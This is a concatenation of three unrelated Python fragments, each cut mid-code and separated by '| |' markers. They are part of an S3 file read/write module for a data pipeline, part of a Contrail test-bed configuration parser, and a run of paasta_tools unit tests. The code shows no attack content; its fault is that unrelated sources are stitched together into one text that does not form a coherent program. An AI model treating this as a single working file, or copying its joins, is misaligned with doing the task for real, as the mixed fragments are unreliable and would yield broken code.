raise ValueError(f'Invalid form={form}; supported values are body, file_obj and download')
status_code = response.get('ResponseMetadata', {}).get('HTTPStatusCode')
if not status_code == 200:
print({ 'level': 'error', 'message': response })
raise Exception('Invalid response code')
meta = lowerMetadataKeys(response.get('Metadata'))
result = { 'metadata': meta, **resolveCustomMetadataAndTags(meta) }
if form == 'body':
content = response.get('Body').read()
if response.get('ContentEncoding') == 'gzip':
result['body'] = gzip.decompress(content)
else:
result['body'] = content
else:
file_obj = smart_open.s3.open(bucket, file_key, 'rb', file.get('version'), resource_kwargs=self.resource_kwargs)
if response.get('ContentEncoding') == 'gzip':
file_obj = gzip.open(file_obj)
if form == 'download':
with tempfile.NamedTemporaryFile(mode='wb', delete=False) as tf:
shutil.copyfileobj(file_obj, tf)
result['download'] = tf.name
file_obj.close()
else:
result['file_obj'] = file_obj
return result
@classmethod
def _is_file_path_valid(cls, filepath) -> Tuple[bool, str]:
filepath = Path(filepath)
if filepath.name == '..' or '..' in (parent.name for parent in filepath.parents):
return False, 'Path cannot contain a directory ".."'
return True, ''
def write_file(self, context, content, file_name, file_category, raw_file, file_meta, ids = None, source_type = None, labels = []):
bucket = raw_file['bucket']
raw_file_key = raw_file['fileKey']
if not(file_category in WRITE_ALLOWED_CATEGORIES):
raise Exception(f'{file_category} is not allowed category for write_file')
if file_category == 'IDS' and ids is None:
raise Exception('ids can not be None when file_category is IDS')
ids_obj = VersionedRef(composite=ids)
pattern = '(.*?)/(.*?)/(?:.*?)/(.*)'
match = re.match(pattern, raw_file_key, flags=re.DOTALL)
if not match:
raise Exception(f'Raw file key {raw_file_key} does not match "{pattern}"')
if source_type is not None:
source_type_match = re.match('^[-a-z0-9]+$', source_type)
if not source_type_match:
raise Exception(f'Source type "{source_type}" contains invalid character or upper case letter')
else:
source_type = getOrEmptyString(file_meta, FIELDS['SOURCE_TYPE'], 'unknown')
org_slug, source_id, raw_file_path = match.groups()
file_key = os.path.join(org_slug, source_id, file_category, raw_file_path, file_name)
is_valid_file_key, reason = self._is_file_path_valid(file_key)
if not is_valid_file_key:
raise InvalidPathException(file_key, reason)
file_id = str(uuid4())
pipelineConfig = context.get('pipelineConfig', {})
pipeline_history_str = getUpdatedPipelineHistoryStr(getOrEmptyString(context, 'pipelineId'),
getOrEmptyString(file_meta, FIELDS['PIPELINE_HISTORY']))
meta = {
# constant
FIELDS['INTEGRATION_TYPE']: 'datapipeline',
FIELDS['VERSION']: '2',
# generated
FIELDS['FILE_ID']: file_id,
# from raw file
FIELDS['RAW_FILE_ID']: getOrEmptyString(file_meta, FIELDS['FILE_ID']),
FIELDS['CUSTOM_METADATA']: getOrEmptyString(file_meta, FIELDS['CUSTOM_METADATA']),
FIELDS['CUSTOM_TAGS']: getOrEmptyString(file_meta, FIELDS['CUSTOM_TAGS']),
FIELDS['SOURCE_NAME']: getOrEmptyString(file_meta, FIELDS['SOURCE_NAME']),
FIELDS['SOURCE_TYPE']: source_type,
FIELDS['TRACE_ID']: getOrEmptyString(file_meta, FIELDS['TRACE_ID']),
# IDS/TMP
**({
FIELDS['IDS']: ids_obj.composite,
FIELDS['IDS_TYPE']: ids_obj.name,
FIELDS['IDS_VERSION']: ids_obj.version,
} if ids is not None and (file_category == 'IDS' or file_category == 'TMP') else {}),
# from pipeline context
FIELDS['INTEGRATION_ID']: getOrEmptyString(context, 'pipelineId'), # pipeline id
# https://github.com/tetrascience/ts-service-pipeline/blob/development/src/models/create-workflow-command.js#L171
FIELDS['INTEGRATION_NAME']: getOrEmptyString(pipelineConfig, 'pipelineName'),
FIELDS['PIPELINE_ID']: getOrEmptyString(context, 'pipelineId'),
FIELDS['PIPELINE_WORKFLOW_ID']: getOrEmptyString(context, 'workflowId'),
FIELDS['PIPELINE_MASTER_SCRIPT']: f"{context.get('masterScriptNamespace', '')}/{context.get('masterScriptSlug', '')}:{context.get('masterScriptVersion', '')}",
FIELDS['PIPELINE_TASK_EXECUTION_ID']: getOrEmptyString(context, 'taskId'),
FIELDS['PIPELINE_TASK_SCRIPT']: getOrEmptyString(context, 'taskScript'),
FIELDS['PIPELINE_TASK_SLUG']: getOrEmptyString(context, 'taskSlug'),
FIELDS['PIPELINE_HISTORY']: pipeline_history_str
}
params = {
'Bucket': bucket,
'Key': file_key,
'Metadata': meta,
'ServerSideEncryption': 'aws:kms',
'SSEKMSKeyId': get_kms_key_name(org_slug),
'ContentEncoding': 'gzip'
}
if len(labels) > 0:
self.create_labels_file(
target_file={
'type': 's3file',
'bucket': bucket,
'fileKey': file_key,
'fileId': file_id
},
labels=labels,
sse_kms_key_id=get_kms_key_name(org_slug)
)
version_id = ''
if hasattr(content, 'read'):
response = S3FileobjUploader(
self.s3, content, params, { 'disable_gzip': DISABLE_GZIP }).upload()
# fakeS3 does not return VersionId, so use '' to avoid an exception
version_id = response.get('VersionId', '')
print({'level': 'debug', 'message': 'file created', 'response': response})
else:
if not DISABLE_GZIP:
if (isinstance(content, str)):
content = content.encode()
content = gzip.compress(content)
file_size = len(content) or 0
if file_size >= LARGE_FILE_SIZE_THRESHOLD_BYTES:
print({'level': 'debug', 'message': 'writing a 5+ GB file to s3'})
# the upload_fileobj method requires a file like object that implements read. This means we have to
# wrap content into an in memory stream. We will use BytesIO instead of StringIO since the metadata has
# to be encoded. This means that if content is a string, we have to convert it to bytes first.
file_like_obj = None
if type(content) is str:
file_like_obj = io.BytesIO(content.encode('utf-8'))
else:
# content was already bytes so we should not try to encode it again
file_like_obj = io.BytesIO(content)
try:
extra_args = self.extract_extra_args_from_params(params)
self.s3.upload_fileobj(Fileobj=file_like_obj, Bucket=bucket, Key=file_key, ExtraArgs=extra_args)
version_id = self.get_latest_obj_version(bucket, file_key)
print({'level': 'debug', 'message': 'file created'})
except Exception as e:
raise Exception("encountered an error updating the metadata because of {}".format(e))
finally:
file_like_obj.close()
else:
response = self.s3.put_object(Body=content, **params)
# fakeS3 does not return VersionId, so use '' to avoid an exception
version_id = response.get('VersionId', '')
print({ 'level': 'debug', 'message': 'file created', 'response': response })
result_file = {
'type': 's3file',
'bucket': bucket,
'fileKey': file_key,
'fileId': file_id,
'version': version_id
}
return result_file
def update_metadata_tags(self, context, file, custom_meta, custom_tags, options = {}):
bucket = file['bucket']
file_key = file['fileKey']
head = self.get_s3_head(file)
current_meta = lowerMetadataKeys(head.get('Metadata'))
if not FIELDS['FILE_ID'] in current_meta:
raise Exception('no FILE_ID in meta!')
if (not custom_meta) and (not custom_tags):
print({'level': 'debug', 'message': 'no action taken because no metadata or tags provided'})
return file
isASCII = lambda s: s and isinstance(s, str) and bool(re.match(r'^[\x00-\x7F]*$', s))
custom_meta_str = current_meta.get(FIELDS['CUSTOM_METADATA'], '') or ''
current_custom_meta = query_string.parse(custom_meta_str)
if custom_meta:
custom_meta_merged = {**current_custom_meta, **custom_meta}
custom_meta_merged = {k:v for k,v in custom_meta_merged.items() if v is not None}
for k,v in custom_meta_merged.items():
if not isASCII(k):
raise Exception(f'Metadata key {k} contains non-ASCII character')
if not isASCII(str(v)):
raise Exception(f'Metadata value {v} contains non-ASCII character')
custom_meta_str = urlencode(custom_meta_merged)
custom_tags_str = current_meta.get(FIELDS['CUSTOM_TAGS'], '')
if custom_tags:
custom_tags = list(map(lambda x: str(x), custom_tags))
for t in custom_tags:
if not isASCII(t):
raise Exception(f'Tag {t} contains non-ASCII character')
new_custom_tags = list(set(custom_tags_str.split(',') + custom_tags))
new_custom_tags.sort()
custom_tags_str = ','.join([t for t in new_custom_tags if t])
if len(custom_meta_str) + len(custom_tags_str) >= 1024 * 1.5:
raise Exception('Metadata and tags length larger than 1.5KB')
file_id = options.get('new_file_id', str(uuid4()))
pipelineConfig = context.get('pipelineConfig', {})
pipeline_history_str = getUpdatedPipelineHistoryStr(getOrEmptyString(context, 'pipelineId'),
getOrEmptyString(current_meta, FIELDS['PIPELINE_HISTORY']))
params = {
'Bucket': bucket,
'CopySource': f'/{bucket}/{file_key}',
# 'CopySourceIfUnmodifiedSince': head['LastModified'], # ensure no conflict?
'Key': file_key,
'ContentEncoding': head.get('ContentEncoding', None),
'ContentType': head['ContentType'],
'Metadata': {
**current_meta,
# constant
FIELDS['INTEGRATION_TYPE']: 'datapipeline',
FIELDS['VERSION']: '2',
| |
from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
from builtins import str
from builtins import next
from builtins import range
from builtins import object
import os
import re
import sys
import json
import time
import socket
import getpass
import configparser
import ast
from netaddr import *
import fixtures
from fabric.api import env, run, local, sudo
from fabric.operations import get, put, reboot
from fabric.context_managers import settings, hide
from fabric.exceptions import NetworkError
from fabric.contrib.files import exists
from tcutils.util import *
from tcutils.util import custom_dict, read_config_option, get_build_sku, retry
from tcutils.custom_filehandler import *
from tcutils.contrail_status_check import ContrailStatusChecker
from keystone_tests import KeystoneCommands
from tempfile import NamedTemporaryFile
import re
from common import log_orig as contrail_logging
from common.contrail_services import *
import subprocess
from collections import namedtuple
import random
from vnc_api import utils
import argparse
import yaml
from future.utils import with_metaclass
ORCH_DEFAULT_DOMAIN = {
'openstack' : 'Default',
'kubernetes': 'default-domain',
'vcenter': 'default-domain',
}
DEFAULT_CERT = '/etc/contrail/ssl/certs/server.pem'
DEFAULT_PRIV_KEY = '/etc/contrail/ssl/private/server-privkey.pem'
DEFAULT_CA = '/etc/contrail/ssl/certs/ca-cert.pem'
DEFAULT_CI_IMAGE = os.getenv('DEFAULT_CI_IMAGE', 'cirros')
DEFAULT_CI_SVC_IMAGE = os.getenv('DEFAULT_CI_SVC_IMAGE', 'cirros_in_net')
CI_IMAGES = [DEFAULT_CI_IMAGE, DEFAULT_CI_SVC_IMAGE]
OPENSHIFT_CONFIG_FILE = '/root/.kube/config'
K8S_CONFIG_FILE = '/etc/kubernetes/admin.conf'
# License: PSF License 2.0
# Copyright (c) 2003-2005 by <NAME> <<EMAIL>>
# https://hg.python.org/cpython/file/d37f963394aa/Lib/subprocess.py
# monkey patch subprocess.check_output cos its not supported in 2.6
if "check_output" not in dir(subprocess): # duck punch it in!
def f(*popenargs, **kwargs):
if 'stdout' in kwargs:
raise ValueError(
'stdout argument not allowed, it will be overridden.')
process = subprocess.Popen(
stdout=subprocess.PIPE,
*popenargs,
**kwargs)
output, unused_err = process.communicate()
retcode = process.poll()
if retcode:
cmd = kwargs.get("args")
if cmd is None:
cmd = popenargs[0]
raise subprocess.CalledProcessError(retcode, cmd)
return output
subprocess.check_output = f
class TestInputs(with_metaclass(Singleton, object)):
'''
Class that would populate testbedinfo from parsing the
.ini and .json input files if provided (or)
check the keystone server to populate
the same with the certain default value assumptions
'''
def __init__(self, input_file, logger=None):
self.jenkins_trigger = self.get_os_env('JENKINS_TRIGGERED')
self.os_type = custom_dict(self.get_os_version, 'os_type')
self.config = None
self.input_file = input_file
self.logger = logger or contrail_logging.getLogger(__name__)
self.tor_agent_data = {}
self.sriov_data = []
self.dpdk_data = {}
self.mysql_token = None
self.pcap_on_vm = False
self.parse_yml_file()
if self.fip_pool:
update_reserve_cidr(self.fip_pool)
if not self.ui_browser and (self.verify_webui or self.verify_horizon):
raise ValueError(
"Verification via GUI needs 'browser' details. Please set the same.")
self.username = self.host_data[self.cfgm_ip]['username']
self.password = self.host_data[self.cfgm_ip]['password']
insecure = istrue(os.getenv('OS_INSECURE', False))
if insecure:
self.api_insecure = self.insecure = insecure
keycertbundle = None
if not self.insecure and self.auth_protocol == 'https' and \
self.keystonecertfile and self.keystonekeyfile and \
self.keystonecafile:
keystone_bundle = '/tmp/' + get_random_string() + '.pem'
keycertbundle = utils.getCertKeyCaBundle(keystone_bundle,
[self.keystonecertfile, self.keystonekeyfile,
self.keystonecafile])
protocol = 'https' if self.contrail_configs.get('SSL_ENABLE') else 'http'
self.api_protocol = 'https' if self.contrail_configs.get(
'CONFIG_API_SSL_ENABLE') else protocol
self.analytics_api_protocol = 'https' if self.contrail_configs.get(
'ANALYTICS_API_SSL_ENABLE') else protocol
self.introspect_protocol = 'https' if self.contrail_configs.get(
'INTROSPECT_SSL_ENABLE') else protocol
if self.api_protocol == 'https':
self.apicertfile = self.contrail_configs.get(
'CONFIG_API_SERVER_CERTFILE') or DEFAULT_CERT
self.apikeyfile = self.contrail_configs.get(
'CONFIG_API_SERVER_KEYFILE') or DEFAULT_PRIV_KEY
self.apicafile = self.contrail_configs.get(
'CONFIG_API_SERVER_CA_CERTFILE') or DEFAULT_CA
if self.introspect_protocol == 'https':
self.introspect_certfile = self.contrail_configs.get(
'INTROSPECT_CERTFILE') or DEFAULT_CERT
self.introspect_keyfile = self.contrail_configs.get(
'INTROSPECT_KEYFILE') or DEFAULT_PRIV_KEY
self.introspect_cafile = self.contrail_configs.get(
'INTROSPECT_CA_CERTFILE') or DEFAULT_CA
if self.analytics_api_protocol == 'https':
self.analytics_certfile = self.contrail_configs.get(
'ANALYTICS_API_SERVER_CERTFILE') or DEFAULT_CERT
self.analytics_keyfile = self.contrail_configs.get(
'ANALYTICS_API_SERVER_KEYFILE') or DEFAULT_PRIV_KEY
self.analytics_cafile = self.contrail_configs.get(
'ANALYTICS_API_SERVER_CA_CERTFILE') or DEFAULT_CA
apicertbundle = None
if not self.api_insecure and self.api_protocol == 'https':
api_bundle = '/tmp/' + get_random_string() + '.pem'
apicertbundle = utils.getCertKeyCaBundle(api_bundle,
[self.apicertfile, self.apikeyfile,
self.apicafile])
analyticscertbundle = None
if not self.analytics_api_insecure and self.analytics_api_protocol == 'https':
analytics_bundle = '/tmp/' + get_random_string() + '.pem'
analyticscertbundle = utils.getCertKeyCaBundle(analytics_bundle,
[self.analytics_certfile, self.analytics_keyfile,
self.analytics_cafile])
introspect_certbundle = None
if not self.introspect_insecure and self.introspect_protocol == 'https':
introspect_bundle = '/tmp/' + get_random_string() + '.pem'
introspect_certbundle = utils.getCertKeyCaBundle(introspect_bundle,
[self.introspect_certfile, self.introspect_keyfile,
self.introspect_cafile])
# introspect_certbundle = self.introspect_cafile
self.certbundle = None
if keycertbundle or apicertbundle or introspect_certbundle or analyticscertbundle:
bundle = '/tmp/' + get_random_string() + '.pem'
certs = [cert for cert in [keycertbundle, apicertbundle, introspect_certbundle, analyticscertbundle] if cert]
self.certbundle = utils.getCertKeyCaBundle(bundle, certs)
# List of service correspond to each module
self.compute_services = [
'contrail-vrouter-agent',
'contrail-vrouter-nodemgr']
self.control_services = ['contrail-control',
'contrail-control-nodemgr', 'contrail-dns',
'contrail-named']
self.cfgm_services = [
'contrail-api',
'contrail-schema',
'contrail-svc-monitor',
'contrail-config-nodemgr',
'contrail-device-manager']
self.webui_services = ['contrail-webui', 'contrail-webui-middleware']
self.openstack_services = [
'openstack-cinder-api', 'openstack-cinder-scheduler',
'openstack-cinder-scheduler', 'openstack-glance-api',
'openstack-glance-registry', 'openstack-keystone',
'openstack-nova-api', 'openstack-nova-scheduler', 'openstack-nova-conductor',
'heat-api', 'heat-api-cfn', 'heat-engine', 'rabbitmq-server']
self.collector_services = [
'contrail-collector', 'contrail-analytics-api',
'contrail-query-engine', 'contrail-analytics-nodemgr']
self.database_services = [
'contrail-database', 'contrail-database-nodemgr']
self.correct_states = ['active', 'backup']
def _set_auth_vars(self):
'''
Set auth_protocol, auth_ip, auth_port from self.auth_url
'''
match = re.match(r'(.*?)://(.*?):([\d]+).*$', self.auth_url, re.M|re.I)
if match:
self.auth_protocol = match.group(1)
self.auth_ip = match.group(2)
self.auth_port = match.group(3)
# end _set_auth_vars
def get_ips_of_host(self, host, nic=None):
if self.host_data[host].get('ips') and not nic:
return self.host_data[host]['ips']
username = self.host_data[host]['username']
password = self.host_data[host]['password']
ips = get_ips_of_host(self.get_host_ip(host), nic=nic,
username=username,
password=password,
as_sudo=True,
logger=self.logger)
if not nic:
self.host_data[host]['ips'] = ips
return ips
def _get_ip_for_service(self, host, service):
host_dict = self.host_data[host]
if service.lower() == 'vrouter':
if self.contrail_configs.get('L3MH_CIDR', None):
return host
ip = self.get_ips_of_host(host, 'vhost0')[0]
self.host_data[host]['control_data_ip'] = ip
return ip
elif service.lower() == 'control':
ip_list = self.contrail_configs.get('CONTROL_NODES') or \
self.contrail_configs.get('CONTROLLER_NODES') or ''
ips = self.get_ips_of_host(host)
for ip in ip_list.split(','):
if ip in ips:
self.host_data[host]['control_data_ip'] = ip
return ip
elif service.lower() == 'openstack':
nic = host_dict['roles']['openstack'].get('network_interface') \
if host_dict['roles']['openstack'] else \
self.orchestrator_configs.get('network_interface')
if not nic:
return host
ips = self.get_ips_of_host(host, nic)
if not ips and 'vrouter' in host_dict['roles']:
ips = self.get_ips_of_host(host, 'vhost0')
if ips:
return ips[0]
return host
else:
service_nodes = service.upper()+'_NODES' if service else ''
if not self.contrail_configs.get(service_nodes):
service_nodes = 'CONTROLLER_NODES'
if self.contrail_configs.get(service_nodes):
cfg_ips = set(self.contrail_configs[service_nodes].split(','))
ips = set(self.get_ips_of_host(host))
if ips.intersection(cfg_ips):
return list(ips.intersection(cfg_ips))[0]
return host
def get_service_ip(self, host, service='CONTROLLER'):
return self._get_ip_for_service(host, service)
def get_service_name(self, host, service_ip):
host_data = self.host_data[host]
if service_ip not in host_data.get('service_name'):
service_name = get_hostname_by_ip(host,
service_ip,
username=host_data['username'],
password=host_data['password'],
as_sudo=True,
logger=self.logger)
host_data['service_name'][service_ip] = service_name or \
host_data['name']
return host_data['service_name'][service_ip]
def parse_topo(self):
self.host_names = []
self.cfgm_ip = ''
self.cfgm_ips = []
self.cfgm_control_ips = []
self.cfgm_names = []
self.openstack_ip = ''
self.openstack_ips = []
self.openstack_control_ips = []
self.openstack_names = []
self.collector_ip = ''
self.collector_ips = []
self.collector_control_ips = []
self.collector_names = []
self.alarmgen_nrs = 0
self.database_ips = []
self.database_names = []
self.database_control_ips = []
self.compute_ips = []
self.compute_names = []
self.contrail_service_nodes = []
self.compute_control_ips = []
self.compute_info = {}
self.bgp_ips = []
self.bgp_control_ips = []
self.bgp_names = []
self.host_ips = []
self.webui_ips = []
self.webui_control_ips = []
self.kube_manager_ips = []
self.kube_manager_control_ips = []
self.k8s_master_ip = ""
self.k8s_slave_ips = []
self.policy_generator_ips = []
self.policy_generator_control_ips = []
self.dpdk_ips = []
self.host_data = {}
self.tor = {}
self.tor_hosts_data = {}
self.physical_routers_data = {}
self.vcenter_compute_ips= []
self.qos_queue = []
self.qos_queue_pg_properties = []
self.ns_agilio_vrouter_data = {}
self.virtio = None
self.esxi_vm_ips = {}
self.vgw_data = {}
self.hypervisors = {}
self.is_dpdk_cluster = False
self.is_sriov_cluster = False
provider_configs = (self.config.get('provider_config') or {}).get('bms') or {}
username = provider_configs.get('ssh_user') or 'root'
password = provider_configs.get('ssh_pwd') or '<PASSWORD>'
self.domainsuffix = provider_configs.get('domainsuffix') or 'englab.juniper.net'
for host, values in (self.config.get('instances') or {}).items():
roles = values.get('roles') or {}
host_data = dict()
host_data['host_ip'] = values['ip']
if 'openstack_control' in roles and not 'openstack' in roles:
roles.update({'openstack': {}})
host_data['roles'] = roles
host_data['username'] = username
host_data['password'] = password
host_data['service_name'] = dict()
self.host_data[host_data['host_ip']] = host_data
hostname = self.run_cmd_on_server(host_data['host_ip'], 'hostname')
host_fqname = self.run_cmd_on_server(host_data['host_ip'], 'hostname -f')
if hostname.endswith('.novalocal'):
hostname = hostname.rstrip('.novalocal')
self.host_names.append(hostname)
self.host_ips.append(host_data['host_ip'])
host_data['name'] = hostname
host_data['fqname'] = host_fqname
self.host_data[host_fqname] = self.host_data[hostname] = host_data
self._check_containers(host_data)
host_data_ip = host_control_ip = host_data['host_ip']
qos_queue_per_host, qos_queue_pg_properties_per_host = \
self._process_qos_data_yml(host_data['host_ip'])
if qos_queue_per_host:
self.qos_queue.append(qos_queue_per_host)
if qos_queue_pg_properties_per_host:
self.qos_queue_pg_properties.append(qos_queue_pg_properties_per_host)
if 'openstack' in roles and ( 'nova' in host_data['containers'] or self.deployer == 'juju'):
self.openstack_ip = host_data['host_ip']
self.openstack_ips.append(host_data['host_ip'])
service_ip = self.get_service_ip(host_data['host_ip'], 'openstack')
self.host_data[service_ip] = host_data
self.openstack_control_ips.append(service_ip)
self.openstack_control_ip = service_ip
service_name = self.get_service_name(host_data['host_ip'], service_ip)
self.openstack_names.append(service_name)
self.host_data[service_name] = host_data
if 'config' in roles:
service_ip = self.get_service_ip(host_data['host_ip'], 'config')
self.host_data[service_ip] = host_data
self.cfgm_ip = service_ip
self.cfgm_ips.append(service_ip)
self.cfgm_control_ips.append(service_ip)
self.cfgm_control_ip = service_ip
service_name = self.get_service_name(host_data['host_ip'], service_ip)
self.cfgm_names.append(service_name)
self.host_data[service_name] = host_data
self.hostname = hostname
if 'vrouter' in roles:
data_ip = self.get_service_ip(host_data['host_ip'], 'vrouter')
#For single-interface , setting hostname to hostfqname to make vcenter
#scenario work
if data_ip != host_data['host_ip']:
host_data['name'] = hostname
else:
#not able to get host_fqname from singleinterface vcenter contrailvm
if self.deployer == 'rhosp' and len(hostname.split('.')) > 1:
host_data['name'] = hostname
else:
host_data['name'] = '.'.join([hostname,self.domainsuffix])
#
if roles['vrouter'] and roles['vrouter'].get('TSN_EVPN_MODE'):
self.contrail_service_nodes.append(hostname)
else:
self.compute_ips.append(host_data['host_ip'])
service_name = self.get_service_name(host_data['host_ip'], data_ip)
self.compute_names.append(service_name)
self.compute_info[service_name] = host_data['host_ip']
self.compute_control_ips.append(data_ip)
self.host_data[service_name] = host_data
if service_name != hostname:
self.compute_info[hostname] = host_data['host_ip']
if roles['vrouter']:
if roles['vrouter'].get('AGENT_MODE') == 'dpdk':
host_data['is_dpdk'] = True
self.is_dpdk_cluster = True
self.dpdk_ips.append(host_data['host_ip'])
host_data_ip = host_control_ip = data_ip
if 'control' in roles:
service_ip = self.get_service_ip(host_data['host_ip'], 'control')
self.bgp_ips.append(host_data['host_ip'])
self.bgp_control_ips.append(service_ip)
service_name = self.get_service_name(host_data['host_ip'], service_ip)
self.bgp_names.append(service_name)
host_data_ip = host_control_ip = service_ip
self.host_data[service_name] = host_data
if 'webui' in roles:
service_ip = self.get_service_ip(host_data['host_ip'], 'webui')
| |
'Id': 'ef978820f195dede62e206bbd41568463ab2b79260bc63835a72154fe7e196a2',
'Size': 0,
},
]
assert utils.check_docker_image('test_service', 'tag2') is False
@mock.patch('paasta_tools.utils.build_docker_image_name', autospec=True)
def test_check_docker_image_true(mock_build_docker_image_name):
fake_app = 'fake_app'
fake_commit = 'fake_commit'
mock_build_docker_image_name.return_value = 'fake-registry/services-foo'
docker_tag = utils.build_docker_tag(fake_app, fake_commit)
with mock.patch('paasta_tools.utils.get_docker_client', autospec=True) as mock_docker:
docker_client = mock_docker.return_value
docker_client.images.return_value = [
{
'Created': 1425430339,
'VirtualSize': 250344331,
'ParentId': '1111',
'RepoTags': [docker_tag],
'Id': 'ef978820f195dede62e206bbd41568463ab2b79260bc63835a72154fe7e196a2',
'Size': 0,
},
]
assert utils.check_docker_image(fake_app, fake_commit) is True
def test_remove_ansi_escape_sequences():
plain_string = 'blackandwhite'
colored_string = '\033[34m' + plain_string + '\033[0m'
assert utils.remove_ansi_escape_sequences(colored_string) == plain_string
def test_missing_cluster_configs_are_ignored():
fake_soa_dir = '/nail/etc/services'
fake_cluster_configs = [
'/nail/etc/services/service1/marathon-cluster1.yaml',
'/nail/etc/services/service2/chronos-cluster2.yaml',
]
expected = []
with mock.patch(
'os.path.join', autospec=True, return_value='%s/*' % fake_soa_dir,
) as mock_join_path, mock.patch(
'glob.glob', autospec=True, return_value=fake_cluster_configs,
) as mock_glob:
actual = utils.list_clusters(soa_dir=fake_soa_dir)
assert actual == expected
mock_join_path.assert_called_once_with(fake_soa_dir, '*')
mock_glob.assert_called_once_with('%s/*/*.yaml' % fake_soa_dir)
def test_list_clusters_no_service_given_lists_all_of_them():
fake_soa_dir = '/nail/etc/services'
fake_soa_cluster_configs = [
['cluster1', '/nail/etc/services/service1/marathon-cluster1.yaml'],
['cluster2', '/nail/etc/services/service1/chronos-cluster2.yaml'],
]
expected = ['cluster1', 'cluster2']
with mock.patch(
'paasta_tools.utils.get_soa_cluster_deploy_files', autospec=True, return_value=fake_soa_cluster_configs,
):
actual = utils.list_clusters(soa_dir=fake_soa_dir)
assert actual == expected
def test_list_clusters_with_service():
fake_soa_dir = '/nail/etc/services'
fake_service = 'fake_service'
fake_soa_cluster_configs = [
['cluster1', '/nail/etc/services/service1/marathon-cluster1.yaml'],
['cluster2', '/nail/etc/services/service1/chronos-cluster2.yaml'],
]
expected = ['cluster1', 'cluster2']
with mock.patch(
'paasta_tools.utils.get_soa_cluster_deploy_files', autospec=True, return_value=fake_soa_cluster_configs,
):
actual = utils.list_clusters(fake_service, fake_soa_dir)
assert actual == expected
def test_list_clusters_ignores_bogus_clusters():
fake_soa_dir = '/nail/etc/services'
fake_service = 'fake_service'
fake_cluster_configs = [
'/nail/etc/services/service1/marathon-cluster1.yaml',
'/nail/etc/services/service1/marathon-PROD.yaml',
'/nail/etc/services/service1/chronos-cluster2.yaml',
'/nail/etc/services/service1/chronos-SHARED.yaml',
]
expected = ['cluster1', 'cluster2']
with mock.patch(
'os.path.join', autospec=True, return_value=f'{fake_soa_dir}/{fake_service}',
), mock.patch(
'glob.glob', autospec=True, return_value=fake_cluster_configs,
), mock.patch(
'builtins.open', autospec=None, path=mock.mock_open(read_data="fakedata"),
):
actual = utils.list_clusters(service=fake_service)
assert actual == expected
def test_list_all_instances_for_service():
service = 'fake_service'
clusters = ['fake_cluster']
mock_instances = [(service, 'instance1'), (service, 'instance2')]
expected = {'instance1', 'instance2'}
with mock.patch(
'paasta_tools.utils.list_clusters', autospec=True,
) as mock_list_clusters, mock.patch(
'paasta_tools.utils.get_service_instance_list', autospec=True,
) as mock_service_instance_list:
mock_list_clusters.return_value = clusters
mock_service_instance_list.return_value = mock_instances
actual = utils.list_all_instances_for_service(service)
assert actual == expected
mock_list_clusters.assert_called_once_with(service, soa_dir=mock.ANY)
mock_service_instance_list.assert_called_once_with(service, clusters[0], None, soa_dir=mock.ANY)
def test_get_service_instance_list():
fake_name = 'hint'
fake_instance_1 = 'unsweet'
fake_instance_2 = 'water'
fake_cluster = '16floz'
fake_dir = '/nail/home/hipster'
fake_job_config: Dict[str, Dict] = {
fake_instance_1: {},
fake_instance_2: {},
}
expected = [
(fake_name, fake_instance_1),
(fake_name, fake_instance_1),
(fake_name, fake_instance_1),
(fake_name, fake_instance_1),
(fake_name, fake_instance_2),
(fake_name, fake_instance_2),
(fake_name, fake_instance_2),
(fake_name, fake_instance_2),
]
with mock.patch(
'paasta_tools.utils.service_configuration_lib.read_extra_service_information', autospec=True,
return_value=fake_job_config,
) as read_extra_info_patch:
actual = utils.get_service_instance_list(fake_name, fake_cluster, soa_dir=fake_dir)
read_extra_info_patch.assert_any_call(fake_name, 'marathon-16floz', soa_dir=fake_dir)
read_extra_info_patch.assert_any_call(fake_name, 'chronos-16floz', soa_dir=fake_dir)
read_extra_info_patch.assert_any_call(fake_name, 'paasta_native-16floz', soa_dir=fake_dir)
assert read_extra_info_patch.call_count == 4
assert sorted(expected) == sorted(actual)
def test_get_service_instance_list_ignores_underscore():
fake_name = 'hint'
fake_instance_1 = 'unsweet'
fake_instance_2 = '_ignore_me'
fake_cluster = '16floz'
fake_dir = '/nail/home/hipster'
fake_job_config: Dict[str, Dict] = {
fake_instance_1: {},
fake_instance_2: {},
}
expected = [
(fake_name, fake_instance_1),
(fake_name, fake_instance_1),
(fake_name, fake_instance_1),
(fake_name, fake_instance_1),
]
with mock.patch(
'paasta_tools.utils.service_configuration_lib.read_extra_service_information', autospec=True,
return_value=fake_job_config,
):
actual = utils.get_service_instance_list(service=fake_name, cluster=fake_cluster, soa_dir=fake_dir)
assert sorted(expected) == sorted(actual)
def test_get_services_for_cluster():
cluster = 'honey_bunches_of_oats'
soa_dir = 'completely_wholesome'
instances = [
[
('fake_service1', 'this_is_testing'),
('fake_service1', 'all_the_things'),
],
[
('fake_service2', 'my_nerf_broke'),
],
]
expected = [
('fake_service2', 'my_nerf_broke'),
('fake_service1', 'this_is_testing'),
('fake_service1', 'all_the_things'),
]
with mock.patch(
'os.path.abspath', autospec=True, return_value='chex_mix',
) as abspath_patch, mock.patch(
'os.listdir', autospec=True, return_value=['dir1', 'dir2'],
) as listdir_patch, mock.patch(
'paasta_tools.utils.get_service_instance_list',
side_effect=lambda a, b, c, d: instances.pop(), autospec=True,
) as get_instances_patch:
actual = utils.get_services_for_cluster(cluster, soa_dir=soa_dir)
assert expected == actual
abspath_patch.assert_called_once_with(soa_dir)
listdir_patch.assert_called_once_with('chex_mix')
get_instances_patch.assert_any_call('dir1', cluster, None, soa_dir)
get_instances_patch.assert_any_call('dir2', cluster, None, soa_dir)
assert get_instances_patch.call_count == 2
def test_get_services_for_cluster_ignores_underscore():
cluster = 'honey_bunches_of_oats'
soa_dir = 'completely_wholesome'
instances = [
[
('fake_service1', 'this_is_testing'),
('fake_service1', 'all_the_things'),
('fake_service1', '_ignore_me'),
],
[
('fake_service2', 'my_nerf_broke'),
],
]
expected = [
('fake_service2', 'my_nerf_broke'),
('fake_service1', 'this_is_testing'),
('fake_service1', 'all_the_things'),
]
with mock.patch(
'os.path.abspath', autospec=True, return_value='chex_mix',
), mock.patch(
'os.listdir', autospec=True, return_value=['dir1', 'dir2'],
), mock.patch(
'paasta_tools.utils.get_service_instance_list',
side_effect=lambda a, b, c, d: instances.pop(), autospec=True,
):
actual = utils.get_services_for_cluster(cluster, soa_dir=soa_dir)
assert expected == actual
def test_color_text():
expected = f"{utils.PaastaColors.RED}hi{utils.PaastaColors.DEFAULT}"
actual = utils.PaastaColors.color_text(utils.PaastaColors.RED, "hi")
assert actual == expected
def test_color_text_nested():
